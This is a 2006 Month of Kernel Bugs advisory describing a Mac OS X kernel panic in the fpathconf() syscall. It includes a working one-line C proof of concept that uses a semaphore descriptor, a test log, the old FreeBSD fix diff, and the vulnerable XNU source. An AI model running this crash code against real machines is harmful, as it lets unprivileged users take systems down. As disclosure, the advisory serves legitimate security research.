MOKB-09-11-2006 OMG! PWNIES! M4C BUGS NOW COME IN P1NK!

Bug details
Title: Mac OS X fpathconf() syscall denial of service Warning - wet floor!
Description: Failure to handle unknown file types by the Mac OS X kernel (XNU) fpathconf() syscall causes a kernel panic, leading to an exploitable local denial of service by non-privileged users. The bug was fixed by FreeBSD on Tue Jun 27 23:08:36 2000 UTC (6 years, 4 months ago).
Author/Contributor: Ilja Van Sprundel - found issue, reported to Apple time ago (silently, yet partially, fixed; thus still broken).
NA<NAgt; - MOKB release, "proof of concept".
References:
Proof of concept or exploit: One-liner:
#include <unistd.h>
#include <semaphore.h>

int main() {
        fpathconf(sem_open("DaringWussball", O_CREAT, S_IRWXU, 1), 0);
}
				
Debugging information:

It's been tested on an up-to-date (09-11-2006) Mac OS X installation, running on an Intel "shipping" Mac.

rome:~NA uname -a
Darwin rome.local 8.8.1 Darwin Kernel Version 8.8.1: Mon Sep 25 19:42:00 PDT 2006;
root:xnu-792.13.8.obj~1/RELEASE_I386 i386 i386

===================================================================
RCS file: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v
retrieving revision 1.84
retrieving revision 1.85
diff -u -p -r1.84 -r1.85
--- src/sys/kern/kern_descrip.c	2000/05/26 02:04:33	1.84
+++ src/sys/kern/kern_descrip.c	2000/06/27 23:08:36	1.85 <--- 6 years, 4 months ago
@@ -36,7 +36,7 @@
  * SUCH DAMAGE.
  *
  *	@(#)kern_descrip.c	8.6 (Berkeley) 4/19/94
- * $FreeBSD: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v 1.84 2000/05/26 02:04:33 jake Exp $
+ * $FreeBSD: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v 1.85 2000/06/27 23:08:36 alfred Exp $
  */
 
 #include "opt_compat.h"
@@ -642,7 +642,7 @@ fpathconf(p, uap)
 		return (VOP_PATHCONF(vp, uap->name, p->p_retval));
 
 	default:
-		panic("fpathconf");
+		return (EOPNOTSUPP);
 	}
 	/*NOTREACHED*/
 }

------ xnu-792.6.76/bsd/kern/kern_descrip.c
/*
 * Return pathconf information about a file descriptor.
 */
int
fpathconf(p, uap, retval)
	struct proc *p;
	register struct fpathconf_args *uap;
	register_t *retval;
{
	int fd = uap->fd;
	struct fileproc *fp;
	struct vnode *vp;
	struct vfs_context context;
	int error = 0;
	short type;
	caddr_t data;


	AUDIT_ARG(fd, uap->fd);
	if ( (error = fp_lookup(p, fd, &fp, 0)) )
		return(error);
	type = fp->f_type;
	data = fp->f_data;

	switch (type) {

	case DTYPE_SOCKET:
	    (...)
		error = 0;
		goto out;

	case DTYPE_PIPE:
	        *retval = PIPE_BUF;
		error = 0;
		goto out;

	case DTYPE_VNODE:
		(...)
		goto out;

	case DTYPE_PSXSHM:
	case DTYPE_KQUEUE:
		error = EINVAL;
		goto out;

	default:
		panic("fpathconf (unrecognized - %d)", type);   <----- not covered cases, panic.
	}
	/*NOTREACHED*/
out:
	fp_drop(p, fd, fp, 0);
	return(error);
}
------ xnu-792.6.76/bsd/kern/kern_descrip.c